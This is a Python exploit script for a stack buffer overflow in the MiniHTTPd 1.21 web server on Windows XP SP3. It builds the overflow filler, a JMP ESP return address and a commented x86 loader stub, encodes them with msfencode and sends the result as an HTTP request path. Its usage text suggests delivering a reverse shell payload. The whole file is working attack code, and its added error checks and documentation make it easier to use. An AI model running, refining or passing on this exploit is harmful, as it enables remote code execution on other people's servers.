import
struct, socket, sys, subprocess
def file_content(path):
    """Return the whole file at *path* as raw bytes (opened in binary mode)."""
    handle = open(path, 'rb')
    try:
        return handle.read()
    finally:
        handle.close()
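def pwn(host, port, payload, timeout=None):
    """Deliver *payload* to the target as the request path of an HTTP POST.

    The request on the wire is ``POST /<payload> HTTP/1.1`` followed by a
    ``Host:`` header naming *host* and an empty line; no body, no
    ``Content-Length`` and no response is read -- the server is expected to
    overflow while handling the overlong URI.  The payload therefore has to
    survive as a URI, which is why the caller encodes it with
    ``ValidCharSet=filepath``.

    Args:
        host: target IP or hostname (resolved by ``connect``); also echoed in
            the ``Host:`` header.
        port: target TCP port.
        payload: raw exploit bytes placed verbatim in the request path.
        timeout: optional socket timeout in seconds.  ``None`` (the default,
            and the original behaviour) blocks indefinitely on connect/send.

    Raises:
        socket.error: on connect or send failure (propagated unchanged).
    """
    print("[*] Connecting to {0}:{1}...".format(host, port))
    # Under Python 2 ``host`` is already a byte string; under 3 it must be
    # encoded before it can be concatenated into the request bytes.
    host_bytes = host if isinstance(host, bytes) else host.encode("ascii")
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        if timeout is not None:
            sock.settimeout(timeout)
        sock.connect((host, port))
        print("[*] Connected, sending payload {0} bytes...".format(len(payload)))
        request = (b"POST /" + payload + b" HTTP/1.1\r\nHost: "
                   + host_bytes + b"\r\n\r\n")
        # sendall, not send: send() may write only part of a several-KB
        # request and the original never checked its return value.
        sock.sendall(request)
        # The original referenced ``s.shutdown`` and ``s.close`` without
        # calling them, so the socket was only released by garbage collection.
        # shutdown is best-effort: a target that died on the request may have
        # already reset the connection, which is not an error for us.
        try:
            sock.shutdown(socket.SHUT_RDWR)
        except socket.error:
            pass
    finally:
        sock.close()
    # Length of the full HTTP request, as the original message reported.
    print("[+] Payload of {0} bytes sent, hopefully your shellcode executed."
          .format(len(request)))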
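def create_payload_thread(final_payload_size):
    """Build the x86 loader stub that precedes the final-stage payload.

    The stub is hard-wired to WinXP SP3 kernel32 addresses and, in order:

    1. ``VirtualAlloc(NULL, 0x1000, MEM_COMMIT|MEM_RESERVE,
       PAGE_EXECUTE_READWRITE)`` -- one RWX page;
    2. copies ``final_payload_size + 4`` bytes from ``[esi]`` into that page
       (``repne movsb``; MOVS ignores the ZF condition, so it acts as ``rep``);
    3. ``CreateThread`` with the copy as the start address;
    4. ``SuspendThread`` on handle -2 (the current-thread pseudo-handle), so
       the thread that ran the overflow stops executing on the smashed stack.

    ESI is ``ESP - 2`` plus an 8-bit immediate that is patched into the
    ``add esi, imm8`` at ``count_offset`` once the stub length is known.  The
    intent is for ESI to land on the final stage the caller appends right
    after this stub; the ``final_payload_size % 4`` term reads as an
    alignment correction.  The exact arithmetic depends on where the
    msfencode decoder leaves ESP, so confirm it in a debugger before reuse.

    Args:
        final_payload_size: length in bytes of the final stage that will be
            appended after the stub.

    Returns:
        The loader stub as bytes.  Its length is fixed; only the patched ESI
        immediate and the copy count vary with ``final_payload_size``.

    Raises:
        ValueError: if ``final_payload_size`` is negative, if the copy of
            ``final_payload_size + 4`` bytes would overrun the single
            0x1000-byte page the stub allocates (the original emitted that
            stub silently), or if the patched ESI offset does not fit a
            signed 8-bit immediate.
    """
    alloc_size = 0x1000  # dwSize passed to VirtualAlloc: one page
    if final_payload_size < 0:
        raise ValueError("final_payload_size must be non-negative, got {0}"
                         .format(final_payload_size))
    if final_payload_size + 4 > alloc_size:
        raise ValueError("final stage of {0} bytes (+4) exceeds the {1:#x}-byte "
                         "page the loader allocates".format(final_payload_size,
                                                            alloc_size))

    virtual_alloc = struct.pack("<L", 0x7c809AE1)   # kernel32!VirtualAlloc (XP SP3)
    create_thread = struct.pack("<L", 0x7c8106c7)   # kernel32!CreateThread (XP SP3)
    suspend_thread = struct.pack("<L", 0x7c83974A)  # kernel32!SuspendThread (XP SP3)
    copy_count = struct.pack("<L", final_payload_size + 4)

    head = b"".join([
        b"\x83\xec\x02",            # sub esp, 2
        b"\x89\xe6",                # mov esi, esp
        b"\x83\xc6\x00",            # add esi, imm8   (imm8 patched below)
    ])
    count_offset = len(head) - 1    # index of the imm8 byte in "add esi, imm8"

    tail = b"".join([
        b"\x31\xdb",                # xor ebx, ebx    ebx = 0, reused as NULL
        b"\x6a\x40",                # push 0x40       flProtect = PAGE_EXECUTE_READWRITE
        b"\x68\x00\x30\x00\x00",    # push 0x3000     flAllocationType = MEM_COMMIT|MEM_RESERVE
        b"\x68" + struct.pack("<L", alloc_size),  # push 0x1000  dwSize
        b"\x53",                    # push ebx        lpAddress = NULL
        b"\xb8" + virtual_alloc,    # mov eax, VirtualAlloc
        b"\xff\xd0",                # call eax        eax = new RWX page
        b"\xb9" + copy_count,       # mov ecx, final_payload_size + 4
        b"\x89\xc7",                # mov edi, eax    destination = new page
        b"\xf2\xa4",                # repne movsb     copy ecx bytes [esi] -> [edi]
        b"\x53\x53\x53",            # push ebx x3     lpThreadId, dwCreationFlags, lpParameter = 0
        b"\x50",                    # push eax        lpStartAddress = copied payload
        b"\x53\x53",                # push ebx x2     dwStackSize = 0, lpThreadAttributes = NULL
        b"\xb8" + create_thread,    # mov eax, CreateThread
        b"\xff\xd0",                # call eax
        b"\x4b\x4b",                # dec ebx x2      ebx = -2 (current-thread pseudo-handle)
        b"\x53",                    # push ebx        hThread
        b"\xb8" + suspend_thread,   # mov eax, SuspendThread
        b"\xff\xd0",                # call eax
        b"\x90" * 4,                # nop padding
    ])
    stub = head + tail

    # Precedence is len(stub) + (final_payload_size % 4), kept as in the
    # original.  The value is sign-extended by "add esi, imm8", so anything
    # >= 0x80 would move ESI backwards; with this stub it is at most 69.
    esi_offset = len(stub) + final_payload_size % 4
    if not 0 <= esi_offset <= 0x7f:
        raise ValueError("ESI offset {0} does not fit a signed imm8".format(esi_offset))

    print("[*] Final stage is {0} bytes.".format(final_payload_size))
    return stub[:count_offset] + struct.pack("B", esi_offset) + stub[count_offset + 1:]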
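def create_stage1(eip_offset=5412, jmp_esp_addr=0x7e4456F7):
    """Build the stage-1 overflow prefix.

    Layout: ``eip_offset`` filler bytes up to the overwritten return address,
    the little-endian address of a ``JMP ESP`` gadget, one NOP, then
    ``sub esp, 0x21``.  The msfencode decoder (told ``BufferRegister=ESP`` /
    ``BufferOffset=42`` by ``create_encoded_shellcode``) is appended right
    after this prefix by the caller; the ESP adjustment is presumably what
    makes that offset line up -- verify in a debugger before retargeting.

    Args:
        eip_offset: bytes of filler before the return address; 5412 is the
            original author's value for MiniHTTPd 1.21.
        jmp_esp_addr: address of a ``JMP ESP`` gadget.  The default is the
            WinXP SP3 address from the original script (the hosting module
            is not recorded here).  Both are parameters so the script can be
            retargeted without editing the function; the defaults reproduce
            the original output byte for byte.

    Returns:
        The prefix as bytes, ``eip_offset + 8`` bytes long.
    """
    filler = b"A" * eip_offset
    ret_addr = struct.pack("<L", jmp_esp_addr)
    # NOP, then "sub esp, 0x21"; the decoder lands immediately after this.
    landing = b"\x90" + b"\x83\xEC\x21"
    return filler + ret_addr + landing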
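def create_encoded_shellcode(payload):
    """Run msfencode over *payload* and return the encoded shellcode.

    The encoder is ``x86/opt_sub`` with ``BufferRegister=ESP`` and
    ``BufferOffset=42`` (the decoder finds its buffer relative to ESP) and
    ``ValidCharSet=filepath`` so the output survives inside an HTTP request
    path.  msfencode is executed directly (argument list, no shell) and must
    be on PATH; its stderr is left attached to the terminal.

    Args:
        payload: raw bytes to encode (loader stub followed by final stage).

    Returns:
        The encoded shellcode bytes as emitted by ``msfencode -t raw``.

    Raises:
        OSError: if msfencode cannot be executed (e.g. not on PATH).
        RuntimeError: if msfencode exits non-zero or writes nothing to
            stdout.  The original ignored both and went on to fire an empty
            or truncated payload at the target.
    """
    print("[*] Input payload of {0} bytes received. Encoding...".format(len(payload)))
    params = [
        'msfencode',
        '-e', 'x86/opt_sub',
        '-t', 'raw',
        'BufferRegister=ESP',
        'BufferOffset=42',
        'ValidCharSet=filepath',
    ]
    encoder = subprocess.Popen(params, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    # communicate() feeds stdin and drains stdout without deadlocking.
    shellcode, _ = encoder.communicate(payload)
    if encoder.returncode != 0:
        raise RuntimeError("msfencode exited with status {0}".format(encoder.returncode))
    if not shellcode:
        raise RuntimeError("msfencode produced no output")
    print("[*] Shellcode of {0} bytes generated.".format(len(shellcode)))
    return shellcode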
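def main(argv):
    """Command-line driver: ``<host> <port> <payloadfile>``, then fire.

    Builds stage 1, reads the raw final stage from *payloadfile*, prefixes
    it with the loader stub, runs the result through msfencode and sends it
    to the target.  The payload file must be the raw, non-encoded output of
    msfpayload (the loader and encoder assume an unencoded blob).

    Args:
        argv: full argument vector, ``argv[0]`` being the program name.

    Returns:
        Process exit status: 0 once the request has been sent, 1 on a usage
        error, a bad port, or an empty payload file (the original exited 0
        in every case and would happily send an empty final stage).
        Failures in the exploit chain (socket errors, msfencode failing)
        propagate as exceptions.
    """
    print("")
    print("MiniHTTPd 1.21 exploit for WinXP SP3 - by TheColonial")
    print("-----------------------------------------------------")
    print("")
    print(" Note: msfencode must be in the path and Metasploit must be up to date.")
    if len(argv) != 4:
        prog = argv[0] if argv else "exploit.py"
        print("")
        print(" Usage: {0} <host> <port> <payloadfile>".format(prog))
        print("")
        print(" host : IP/name of the target host.")
        print(" port : Port that the target is running on.")
        print(" payloadfile : A file with the raw payload that is to be run.")
        print(" This should be the raw, non-encoded output of")
        print(" a call to msfpayload")
        print("")
        print(" eg. {0} 192.168.1.1 80 reverse_shell_raw.bin".format(prog))
        print("")
        return 1

    print("")
    print(" Make sure you have your listeners running!")
    print("")
    host = argv[1]
    try:
        port = int(argv[2])
    except ValueError:
        print("[-] Port must be an integer, got {0!r}".format(argv[2]))
        return 1
    if not 1 <= port <= 65535:
        print("[-] Port {0} is out of range (1-65535).".format(port))
        return 1
    payload_file = argv[3]

    stage1 = create_stage1()
    final_stage = file_content(payload_file)
    if not final_stage:
        # With nothing to run the loader would still allocate, copy 4 bytes
        # and start a thread on them; refuse rather than fire that.
        print("[-] Payload file {0} is empty; nothing to run.".format(payload_file))
        return 1
    thread_payload = create_payload_thread(len(final_stage))
    shellcode = create_encoded_shellcode(thread_payload + final_stage)
    # Trailing filler after the encoded blob, kept from the original.
    padding = b"A" * 0x10
    pwn(host, port, stage1 + shellcode + padding)
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))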